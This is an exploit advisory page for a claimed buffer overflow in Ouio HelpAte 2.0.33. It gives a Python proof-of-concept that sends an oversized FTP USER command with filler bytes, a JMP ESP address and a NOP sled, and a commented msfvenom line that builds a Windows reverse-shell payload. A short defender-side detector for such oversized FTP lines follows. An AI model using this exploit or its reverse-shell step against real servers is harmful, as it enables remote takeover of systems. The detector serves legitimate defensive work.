Ouio HelpAte 2.0.33 Buffer Overflow

2019.12.04
Gaddar (TR)
Risk: High
Local: Yes
Remote: Yes
CVE: N/A
CWE: N/A

Exploit Author : Gaddar ~ Turkish Vulnerability Researcher
Exploit Title : Ouio HelpAte 2.0.33 Buffer Overflow
Team : Yer6Sec.ORG
Exploit Description : The buffer overflow detected in Ouio HelpAte is a vulnerability.
Tested ON : Immunity Debugger 1.85

[#]

#!/usr/bin/python
# Python 2 script: connects to the FTP service on port 21 of the host given as argv[1]
import socket,sys
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((sys.argv[1],21))
buff="C"*4001                 # filler up to the saved return address
buff+="\x53\x93\x42\x7e" #JMP ESP
buff+="\x90"*40               # NOP padding ahead of the payload
#msfvenom -p windows/shell_reverse_tcp LHOST=127.0.0.1 LPORT=4444 -b '\x00\x0a\x0d' -f py
# (encoded payload bytes omitted)
s.recv(1024)                  # read the server banner
s.send('USER'+ buff + '\r\n') # oversized USER command
s.close()

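A defender-side check for the request shape this exploit sends (an oversized USER line made of filler bytes and a NOP run), as an added example that is not part of the original advisory. The 512-byte line limit, the run thresholds, the function name and the sample streams are assumptions constructed for illustration.

```python
import re

MAX_LINE = 512                                   # assumed policy limit for one FTP control line
NOP_RUN = re.compile(rb"\x90{16,}")              # long run of x86 NOP bytes
SAME_BYTE_RUN = re.compile(rb"(.)\1{255,}", re.DOTALL)  # filler such as "C" * 4001
VERB = re.compile(rb"[A-Za-z]{3,4}")             # FTP verbs are 3 or 4 letters

def inspect_ftp_stream(data):
    """Return (verb, line_length, reasons) for each suspicious client control line."""
    findings = []
    for raw in data.split(b"\n"):
        line = raw.rstrip(b"\r")
        if not line:
            continue
        # The request on this page has no space after USER, so take the
        # leading letters instead of splitting on whitespace.
        m = VERB.match(line)
        verb = m.group(0).upper().decode("ascii") if m else "?"
        reasons = []
        if len(line) > MAX_LINE:
            reasons.append("line longer than %d bytes" % MAX_LINE)
        if SAME_BYTE_RUN.search(line):
            reasons.append("long run of one repeated byte")
        if NOP_RUN.search(line):
            reasons.append("x86 NOP run")
        if reasons:
            findings.append((verb, len(line), reasons))
    return findings

# Constructed sample input: a normal login, then a line with the same layout as
# the request above (filler, 4 placeholder bytes, NOP run) and no payload.
SAMPLE_BENIGN = b"USER anonymous\r\nPASS guest@example.com\r\nCWD /pub\r\n"
SAMPLE_OVERSIZE = b"USER" + b"C" * 4001 + b"AAAA" + b"\x90" * 40 + b"\r\n"

if __name__ == "__main__":
    for verb, length, reasons in inspect_ftp_stream(SAMPLE_BENIGN + SAMPLE_OVERSIZE):
        print("%s line of %d bytes: %s" % (verb, length, "; ".join(reasons)))
```

The same length limit enforced in the server before the USER argument is copied would reject this request outright; the byte-run checks are only useful for alerting on captured traffic.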

Copyright 2024, cxsecurity.com